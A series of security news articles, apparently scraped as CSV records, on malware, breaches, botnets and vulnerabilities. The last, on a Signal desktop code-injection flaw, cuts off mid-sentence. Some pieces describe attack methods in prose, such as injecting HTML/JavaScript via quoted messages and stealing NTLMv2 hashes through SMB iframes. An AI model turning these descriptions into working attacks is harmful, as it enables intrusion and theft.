How many victims?
The company didn't confirm how many clients could have been affected in the malware attack. However, the world's leading hospitality corporation, headquartered in Chicago, owns a portfolio of 627 properties in 52 countries.
What was the response?
Hyatt said it had launched an investigation and hired leading third-party cyber security experts to help investigate the malware threat, as well as taken necessary steps to increase security on its computer systems.
What Hyatt customers should do?
Meanwhile, the company has also advised all its customers to review their payment card statements carefully and to report any unauthorized bank transactions.
Moreover, the company reassured its customers that ""customers can feel confident using payment cards at Hyatt hotels worldwide.""
Hyatt became the latest hotel chain to report a potential customer data breach this year, following the data breach in other hotel chains, including Hilton, Starwood, Mandarin Oriental, White Lodging and the Trump Collection that acknowledged finding malware in their payment systems.
China is the birth place for most of malicious Android apps,https://thehackernews.com/2011/11/china-is-birth-place-for-most-of.html,"China is the birth place for most of malicious Android apps
Mobile malware is rising, and there have been explosions in the world of viruses and Trojans. Virus makers are now targeting mobile platforms- thanks to their growing popularity. If we take the statistics from last 6 months, the chances of Android smart phones to be infected have doubled. A new report by TrendMicro says that ""China is the birth place for most of malicious Android applications"" .
Even Android OS is also becoming more and more popular in China. This growth of Android users in China, however, seems to do little for the rocky relationship between Google and the Chinese government. It has been reported that access to the Google Android Market has been intermittent since 2009.
According to a Report by TrendMicro, The inconvenience in accessing the Android Market, one not experienced by users from other countries, can be considered a big factor in the Chinese users' preference in terms of where to download their Android applications.Early third-party app stores were founded as an online forum for some Android fans. The fans discussed topics about the OS, and also released a few applications in the online forum. After the Android Market became inaccessible to China-based users last year, the forums became popular among Android developers and users.
The biggest malware threat to Android users is probably the rogue application model. In this model, attackers pirate a legit program and add some malicious code to it. Then they release it into the market. This repackaging of legit apps poses a lot of danger, and has proved to be an effective and strong malware agent.
To make sure their app stays in the market, attackers use the upgrade attack. They give a clean app in the beginning. And then they offer an upgrade, which is infected with virus. And since most people have automatic updates on, within some time, every device that has the app becomes infected.Mahaffey observed that hackers use different techniques to make their malware spread out widely. Mobile malware is still on its experimental stage. It should be curbed before it becomes a big problem.
"FIFA World Cup 2014, Big Opportunity for Cybercriminals",https://thehackernews.com/2014/06/fifa-world-cup-2014-big-opportunity-for.html,"With the beginning of FIFA World Cup tournaments in Brazil, Football fever is going viral across the world. Soccer or Football is the most popular sport in the world with billions of fans who don't even miss a single tournament.
Now, this is the most awaited and rejoicing atmosphere for Football fans as well as cybercriminals right now. For bad actors, the World Cup is a perfect opportunities to scam people online.
While you are busy figuring out websites where you can stream live Fifa Matches on your PCs without missing a single moment of the world cup tournament, cyber criminals are also busy to launch phishing attacks in form of scams and malwares in order to victimize the system by several Trojans and viruses.
This isn't surprising as cyber criminals have become smart enough to gain from every possible eventuality they get and their prior/common target is every time the users' interest based major news and current events.
The most popular threat this World Cup targets users in the form of phishing attacks. You may see links in messages over emails and social networking sites serving attractive contents of this World Cup such as Free Tickets, merchandise, news and footage of highlights, online streaming videos of footballers behaving badly and many more.
But once clicked, the victims are redirected to the malicious websites that trick users into revealing their private information or installing malicious softwares in order to put their computer systems at risk of malwares and viruses infection or identity theft.
Researchers at the security software maker firm, Symantec, have identified several email scams and in coming days, they also expects to see these scam attempts targeting Soccer fans on social networks as well.
The most common scam is Free Tickets to World Cup 2014. In this Football fevered atmosphere, everyone is seeking to get a free pass or a ticket to the tournament in Brazil and What if you won an all-expenses paid trip to Brazil? It's really like a dream comes true for any Soccer fan.
The security firm has identified several emails that contain a malicious zip file and inside it is an executable file. Once executed, it will allow your computer to be taken over by Trojans and remote administration tools.
Apart from free tickets, news and highlights about different World Cup teams and players can also be used to thwart users into opening up malicious attachments or clicking malicious links.
Researchers have discovered emails that are currently circulating about Neymar da Silva Santos Júnior, a young star player with the Brazilian national team. The email have a malicious word document that could exploit a known vulnerability in the victims' Microsoft Word.
Once the FIFA World Cup begins, cyber criminals starts targeting users by emails and social networks' scams that claim to provide free live stream of various matches. Before you can unlock access to the live stream, it first ask you to fill out a survey or download and install software in order to fetch money from your pockets.
If you are served any link for free tickets to World Cup, consider it as a scam because free stuffs are never free.
If you have to watch live World Cup match, check your local service providers to see where and when you can catch World Cup games online.
Avoid unknown sources to know happenings of your favorite teams and players; visit only official news websites.
If any site ask you for password or credit card information, double check it before proceeding.
Beware of links that either lead you to any application or external Website.
Make sure you have installed an updated Anti-virus solution to avoid latest threats.
Github accounts Hacked in 'Password reuse attack',https://thehackernews.com/2016/06/github-password-hack.html,"Popular code repository site GitHub is warning that a number of users' accounts have been compromised by unknown hackers reusing email addresses and passwords obtained from other recent data breaches.
Yes, GitHub has become the latest target of a password reuse attack after Facebook CEO Mark Zuckerberg and Twitter.
According to a blog post published by Shawn Davenport, VP of Security at GitHub, an unknown attacker using a list of email addresses and passwords obtained from the data breach of ""other online services"" made a significant number of login attempts to GitHub's repository on June 14.
After reviewing the logins, administrators at GitHub found that the attacker had gained access to a number of its users' accounts in order to gain illicit access to their accounts' data.
Although the initial source of the leaked credentials isn't clear, the recent widespread ""megabreaches"" of LinkedIn, MySpace, Tumblr, and the dating site Fling, that have dumped more than 642 Million passwords over the past month could be the cause.
GitHub didn't reveal the number of compromised accounts, though it does not appear that any data was lost; so your source code repos are safe. As Davenport wrote:
""For some accounts, other personal information including listings of accessible repositories and organizations may have been exposed.""
GitHub informed users that it has already reset the passwords of an unspecified number of accounts accessed successfully by the hacker and has begun contacting all affected users to instruct them how to get back into their account.
The company advised its users to ""practice good password hygiene"" and to enable two-factor authentication for its service.
Since the leaked credentials of recent widespread megabreach date back more than 3 years, there may have still been a possibility that those credentials were being re-used by many online users for other services.
So, it's high time you changed your passwords for all social media sites as well as other online services, especially if you use the same password for different websites.
Beebone Botnet Taken Down By International Cybercrime Taskforce,https://thehackernews.com/2015/04/beebone-botnet-malware-hacking.html,"U.S. and European law enforcement agencies have shut down a highly sophisticated piece of the botnet that had infected more than 12,000 computers worldwide, allowing hackers to steal victims' banking information and other sensitive data.
The law enforcement agencies from the United States, United Kingdom and the European Union conducted a joint operation to get rid of the botnet across the globe and seized the command-and-control server that had been used to operate the nasty Beebone (also known as AAEH) botnet.
What's a Botnet?
A botnet is a network of large number of computers compromised with malicious software and controlled surreptitiously by hackers without the knowledge of victims.
Basically, a ""botnet"" is a hacker's ""robot"" that does the malicious work directed by hackers.
Hackers and Cyber Criminals have brushed up their hacking skills and started using Botnets as a cyber weapon to carry out multiple crimes such as DDoS attacks (distributed denial of service), mass spamming, advertising revenue manipulation, cyber espionage, mining bitcoins, surveillance etc.
However, this is not first time we hear about a sophisticated botnet took down by law enforcement agencies.
Just two months ago, law Enforcement took down Ramnit botnet, which infected over 3.2 Million computers worldwide, and last year the FBI and Europol torn down the GameOver Zeus botnet, although it came back a month after its took down.
So, What's new about Beebone Botnet?
Beebone botnet is a downloader software (kind of botnet downloader) that installs other forms of malicious software, including ransomware and rootkits, onto victims' machines without their even consent.
The size of the network it infected was not significant, but the operators managed to maintain control of the infected machines over the years by making Beebone botnet polymorphic in nature, so that it can update itself in order to avoid antivirus detection.
Here's the Kicker:
Beebone botnet updates itself as many as 19 times a day which makes the malware slightly different threat from all the existing botnets as well as prevent botnet detection.
Once infected, the machines was ordered to ""distribute malicious software, harvest users' credentials for online services, including banking services, and extort money from users by encrypting key files and then demanding payment in order to return the data to a readable state,"" the US Computer Emergency Response Team (US-CERT) said.
Initial figures show:
Beebone has infected over 12,000 computers, which seems to be a tiny number compared to other Zeus botnet infection in the past that infected millions of computers across the world.
However, it is believed that there are many more to come. According to Europol, currently there are more than 5 Million unique samples of Beebone botnet in the wild, with over 205,000 samples taken from a total of 23,000 computer systems between 2013 and 2014.
The footprint of Beebone botnet is worldwide:
Beebone infections spread across more than 195 countries. Most of the infections are reported in the United States, followed by Japan, India, and Taiwan, said Europol's Deputy Director of Operations, Wil van Gemert.
What's the best part?
The Federal Bureau of Investigation (FBI) is currently working with other U.S. law enforcement agencies and Europol's European Cybercrime Centre (EC3), the Dutch National High Tech Crime Unit and the Joint Cybercrime Action Taskforce in order to combat Beebone.
Why Botnets re-emerged after took down?
The main reason, according to me, is that the author of the botnet did not get arrested.
It really doesn't matter how many domains the law enforcement took down or how many sinkholes security researchers create if the attackers not arrested…
...nobody can stop criminals from building new Botnet from zero.
Thus, I really appreciate the FBI effort to weed out GameOver Zeus botnet by announcing a reward of $3 Million for the information leading to the direct arrest or conviction of Evgeniy Mikhailovich Bogachev -- The alleged author of GameOver Zeus botnet that stole more than $100 Million from bank accounts.
Hackers Suspected of Causing Second Power Outage in Ukraine,https://thehackernews.com/2016/12/power-outage-ukraine.html,"The same group of hackers that caused the power outage across several regions in Ukraine last Christmas holidays might have once again shut down power supply in northern Ukraine during the weekend.
According to Ukrainian energy provider Ukrenergo, a cyber attack on Kyiv's power grid may have caused the power outages in the country on Saturday, December 17, near midnight.
The blackout affected the northern part of Kiev, the country's capital, and surrounding areas, Ukrenergo Director Vsevolod Kovalchuk explained in a post on Facebook.
Shortly after the incident, Ukrenergo engineers switched to manual mode and started restoring power in approximately 30 minutes in an effort to deal with the cyber attack. Power was fully restored after just an hour and fifteen minutes of the blackout.
According to Kovalchuk, the one responsible for the weekend outage could be an ""external interference through data network,"" however, the company's cybersecurity experts are investigating the incident and will provide more information soon.
Although the reason for the outage is not yet confirmed, authorities believe that the unexpected power outage could be the latest in the series of cyber attacks that managed to strike the Ukrainian electric grid and financial infrastructure in December 2015.
The 2015 energy blackouts were caused with the help of a malware attack, known as BlackEnergy, which was distributed through boobytrapped Word documents and tricked recipients into enabling macros to activate the malicious payload.
Last year, the Ukraine's state security service SBU blamed Russia for causing outages by planting malware on the networks of several regional energy companies.
Also, the United States Cyber firm iSight Partners identified the perpetrator as a Russian group of hackers known as ""Sandworm.""
While security experts have found no hard evidence that links these attacks on Ukrainian energy grid to Russia, they believe that the attackers appear to be a nation state with significant resources.
SCADA system has always been an attractive target for cybercrooks, given the success of Stuxnet malware that was developed by the US and Israeli together to sabotage the Iranian nuclear facilities a few years ago, and ""Havex"" that previously targeted organizations in the energy sector.
Unveiled: SUNSPOT Malware Was Used to Inject SolarWinds Backdoor,https://thehackernews.com/2021/01/unveiled-sunspot-malware-was-used-to.html,"As the investigation into the SolarWinds supply-chain attack continues, cybersecurity researchers have disclosed a third malware strain that was deployed into the build environment to inject the backdoor into the company's Orion network monitoring platform.
Called ""Sunspot,"" the malignant tool adds to a growing list of previously disclosed malicious software such as Sunburst and Teardrop.
""This highly sophisticated and novel code was designed to inject the Sunburst malicious code into the SolarWinds Orion Platform without arousing the suspicion of our software development and build teams,"" SolarWinds' new CEO Sudhakar Ramakrishna explained.
While preliminary evidence found that operators behind the espionage campaign managed to compromise the software build and code signing infrastructure of SolarWinds Orion platform as early as October 2019 to deliver the Sunburst backdoor, the latest findings reveal a new timeline that establishes the first breach of SolarWinds network on September 4, 2019 — all carried out with an intent to deploy Sunspot.
""Sunspot monitors running processes for those involved in compilation of the Orion product and replaces one of the source files to include the Sunburst backdoor code,"" Crowdstrike researchers said in a Monday analysis.
Crowdstrike is tracking the intrusion under the moniker ""StellarParticle.""
Once installed, the malware (""taskhostsvc.exe"") grants itself debugging privileges and sets about its task of hijacking the Orion build workflow by monitoring running software processes on the server, and subsequently replace a source code file in the build directory with a malicious variant to inject Sunburst while Orion is being built.
The subsequent October 2019 version of the Orion Platform release appears to have contained modifications designed to test the perpetrators' ability to insert code into our builds,"" Ramakrishna said, echoing previous reports from ReversingLabs.
The development comes as Kaspersky researchers found what appears to be a first potential connection between Sunburst and Kazuar, a malware family linked to Russia's Turla state-sponsored cyber-espionage outfit.
The cybersecurity firm, however, refrained from drawing too many inferences from the similarities, instead suggesting that the overlaps may have been intentionally added to mislead attribution.
While the similarities are far from a smoking gun tying the hack to Russia, U.S. government officials last week formally pinned the Solorigate operation on an adversary ""likely Russian in origin.""
New Attack Targeting Microsoft Outlook Web App (OWA) to Steal Email Passwords,https://thehackernews.com/2015/10/hack-microsoft-outlook-email.html,"Researchers have unearthed a dangerous backdoor in Microsoft's Outlook Web Application (OWA) that has allowed hackers to steal e-mail authentication credentials from major organizations.
The Microsoft Outlook Web Application or OWA is an Internet-facing webmail server that is being deployed in private companies and organisations to provide internal emailing capabilities.
Researchers from security vendor Cybereason discovered a suspicious DLL file loaded into the company's OWA server that siphoned decrypted HTTPS server requests.
Although the file had the same name as another benign DLL file, the suspicious DLL file was unsigned and loaded from another directory.
Hackers Placed Malicious DLL on OWA Server
According to the security firm, the attacker replaced the OWAAUTH.dll file (used by OWA as part of the authentication mechanism) with one that contained a dangerous backdoor.
Since it ran on the OWA server, the backdoored DLL file allowed hackers to collect all HTTPS-protected server requests, including login information after they had been decrypted, i.e., in clear text.
""OWA was configured in [such] a way that [it] allowed Internet-facing access to the server,"" Cybereason wrote in a post published Monday. ""This enabled the hackers to establish persistent control over the entire organization's environment without being detected for several months.""
Hackers Stole 11,000 Credentials
Every user accessing the hacked server had their username & password compromised and stored by the attackers.
Researchers discovered more than 11,000 usernames and passwords combinations in a log.txt file in the server's ""C:\"" partition. Log.txt file is believed to be used by attackers to store all logged data.
The unnamed company that detected ""behavioural abnormalities"" across its network before reaching out to security firm Cybereason had more than 19,000 endpoints.
To prevent their backdoor from being removed, the attackers also created an IIS (Microsoft's Web server) filter through which they loaded the malicious OWAAUTH.dll file every time the server was restarted.
To add icing to the cake — the advanced persistent attackers utilized a .NET assembly cache in order to avoid auditing and security inspection.
The security firm did not say how widespread this attack is beyond it targeting one organisation, but there are chances that the attack is or could be hitting other large organizations as well.
Intel CPU Vulnerability can provide control of your system to attacker,https://thehackernews.com/2012/06/intel-cpu-vulnerability-can-provide.html,"Intel CPU Vulnerability can provide control of your system to attacker
The U.S. Computer Emergency Readiness Team (US-CERT) has disclosed a flaw in Intel chips that could allow hackers to gain control of Windows and other operating systems.
The flaw has already been exploited on 64-bit versions of Microsoft Windows 7, FreeBSD, NetBSD and there's a chance Apple's OS X may also be vulnerable.
The flaw was disclosed the vulnerability in a security advisory released this week. Attackers could execute malicious code via kernel privileges or launch a local privilege escalation attack.
VMware's virtualization software is not affected, and neither are AMD's processors, as they do not use the SYSRET instruction whose incorrect handling causes the flaw or handle it differently.Many of the affected vendors have already pushed out an update that defuses the flaw.
However, it said that while 32-bit operating systems are safe, ""Intel CPUs that use the Intel 64 extension need the security patches released by Microsoft in their MS12-042 security bulletin.""
Another severe flaw in Signal desktop app lets hackers steal your chats in plaintext,https://thehackernews.com/2018/05/signal-desktop-hacking.html,"For the second time in less than a week, users of the popular end-to-end encrypted Signal messaging app have to update their desktop applications once again to patch another severe code injection vulnerability.
Discovered Monday by the same team of security researchers, the newly discovered vulnerability poses the same threat as the previous one, allowing remote attackers to inject malicious code on the recipients' Signal desktop app just by sending them a message—without requiring any user interaction.
To understand more about the first code injection vulnerability (CVE-2018-10994), you can read our previous article covering how researchers find the Signal flaw and how it works.
The only difference between the two is that the previous flaw resides in the function that handles links shared in the chat, whereas the new vulnerability (CVE-2018-11101) exists in a different function that handles the validation of quoted messages, i.e., quoting a previous message in a reply.
In other words, to exploit the newly patched bug on vulnerable versions of Signal desktop app, all an attacker needs to do is send a malicious HTML/javascript code as a message to the victim, and then quote/reply to that same message with any random text.
If the victim receives this quoted message containing the malicious payload on its vulnerable Signal desktop app, it will automatically execute the payload, without requiring any user interaction.
Exploiting Signal Code Injection to Steal Plaintext Chats
Until now the proof-of-concept payloads used to demonstrate code injection vulnerabilities in Signal were limited to embedding an HTML iFrame, or image/video/audio tags onto the victim's desktop app.
However, researchers have now managed to craft a new PoC exploit that could allow remote attackers to successfully steal all Signal conversations of the victims in the plaintext just by sending them a message.
This hack literally defeats the purpose of an end-to-end encrypted messaging app, allowing remote attackers to easily get the hold on users' plain-text conversations without breaking the encryption.
Attackers Could Possibly Steal Windows Password As Well
What's worse?
In their blog post, the researchers also indicated that an attacker could even include files from a remote SMB share using an HTML iFrame, which can be abused to steal NTLMv2 hashed password for Windows users.
""In the Windows operative system, the CSP fails to prevent remote inclusion of resources via the SMB protocol. In this case, remote execution of JavaScript can be achieved by referencing the script in an SMB share as the source of an iframe tag, for example: